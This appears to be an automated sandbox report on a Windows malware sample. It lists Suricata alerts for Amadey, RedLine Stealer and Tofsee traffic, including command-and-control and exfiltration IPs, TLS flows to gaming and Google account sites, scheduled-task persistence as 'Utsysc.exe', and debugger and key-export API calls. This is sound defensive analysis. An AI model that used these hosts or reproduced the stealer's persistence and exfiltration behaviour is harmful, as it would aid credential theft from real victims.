TCP 192.168.56.101:49314 -> 192.229.232.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49323 -> 192.229.232.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49325 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49340 -> 142.250.206.205:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49351 -> 142.250.207.46:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49200 -> 185.196.8.176:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected
TCP 192.168.56.101:49352 -> 142.250.207.46:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49269 -> 185.196.8.176:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49277 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49354 -> 142.250.76.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49278 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49200 -> 185.196.8.176:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49298 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49303 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.196.8.176:80 -> 192.168.56.101:49200	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.196.8.176:80 -> 192.168.56.101:49200	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 18.64.8.109:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49316 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49344 -> 142.251.222.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49348 -> 142.250.207.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49350 -> 142.250.207.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 64.185.227.156:443 -> 192.168.56.101:49218	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49200 -> 185.196.8.176:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 64.185.227.156:443 -> 192.168.56.101:49228	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49242 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 77.91.124.86:19084	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 77.91.124.86:19084	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.124.86:19084 -> 192.168.56.101:49256	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49296 -> 54.175.89.124:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49302 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49324 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49326 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49328 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49335 -> 104.76.78.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49336 -> 104.76.78.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49345 -> 142.251.222.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49346 -> 142.250.207.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49353 -> 142.250.76.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49212 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 192.168.56.101:49215 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49286 104.76.78.101:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1 192.168.56.101:49295 54.175.89.124:443	C=US, O=Amazon, CN=Amazon RSA 2048 M02	CN=epicgames.com	21:bc:17:60:8c:aa:c2:6d:83:1b:00:7b:40:7b:7e:f4:14:72:79:24
TLSv1 192.168.56.101:49301 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49300 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49305 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49306 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49309 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49308 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49310 18.64.8.109:443	C=US, O=Amazon, CN=Amazon RSA 2048 M03	CN=unrealengine.com	ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1 192.168.56.101:49285 104.76.78.101:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1 192.168.56.101:49304 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49319 172.64.145.151:443	None	None	None
TLSv1 192.168.56.101:49307 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49327 172.64.145.151:443	None	None	None
TLSv1 192.168.56.101:49320 172.64.145.151:443	None	None	None
TLSv1 192.168.56.101:49321 172.64.145.151:443	None	None	None
TLSv1 192.168.56.101:49338 142.250.207.46:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f
TLSv1 192.168.56.101:49339 142.250.207.46:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f
TLSv1 192.168.56.101:49341 142.250.206.205:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1 192.168.56.101:49347 142.250.207.99:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.101:49349 142.250.207.99:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.101:49275 142.250.206.205:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1 192.168.56.101:49299 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49312 18.64.8.109:443	C=US, O=Amazon, CN=Amazon RSA 2048 M03	CN=unrealengine.com	ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1 192.168.56.101:49325 172.64.145.151:443	None	None	None
TLSv1 192.168.56.101:49340 142.250.206.205:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1 192.168.56.101:49351 142.250.207.46:443	None	None	None
TLSv1 192.168.56.101:49352 142.250.207.46:443	None	None	None
TLSv1 192.168.56.101:49354 142.250.76.132:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	f5:cc:da:b5:ba:1e:14:14:44:cc:27:90:92:cc:60:1f:5f:08:af:77
TLSv1 192.168.56.101:49298 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49303 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49311 18.64.8.109:443	C=US, O=Amazon, CN=Amazon RSA 2048 M03	CN=unrealengine.com	ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1 192.168.56.101:49316 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49344 142.251.222.42:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	fa:d7:68:e4:12:7d:fe:22:87:de:95:f1:1e:49:5a:49:fa:12:1e:b9
TLSv1 192.168.56.101:49348 142.250.207.99:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.101:49350 142.250.207.99:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.101:49296 54.175.89.124:443	C=US, O=Amazon, CN=Amazon RSA 2048 M02	CN=epicgames.com	21:bc:17:60:8c:aa:c2:6d:83:1b:00:7b:40:7b:7e:f4:14:72:79:24
TLSv1 192.168.56.101:49302 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49324 172.64.145.151:443	None	None	None
TLSv1 192.168.56.101:49328 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.101:49326 172.64.145.151:443	None	None	None
TLSv1 192.168.56.101:49335 104.76.78.101:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1 192.168.56.101:49336 104.76.78.101:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1 192.168.56.101:49345 142.251.222.42:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	fa:d7:68:e4:12:7d:fe:22:87:de:95:f1:1e:49:5a:49:fa:12:1e:b9
TLSv1 192.168.56.101:49346 142.250.207.99:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.101:49353 142.250.76.132:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	f5:cc:da:b5:ba:1e:14:14:44:cc:27:90:92:cc:60:1f:5f:08:af:77

Queries for the computername (30 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 3, 2023, 6:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (18 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 3, 2023, 6:09 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:09 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:09 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:09 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 6:10 p.m.			0	0

Command line console output was observed (50 out of 267 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 3, 2023, 6:09 p.m.	buffer: SUCCESS: The scheduled task "Utsysc.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Nov. 3, 2023, 6:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Nov. 3, 2023, 6:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 6:09 p.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627a48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627a48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627a48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627a48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
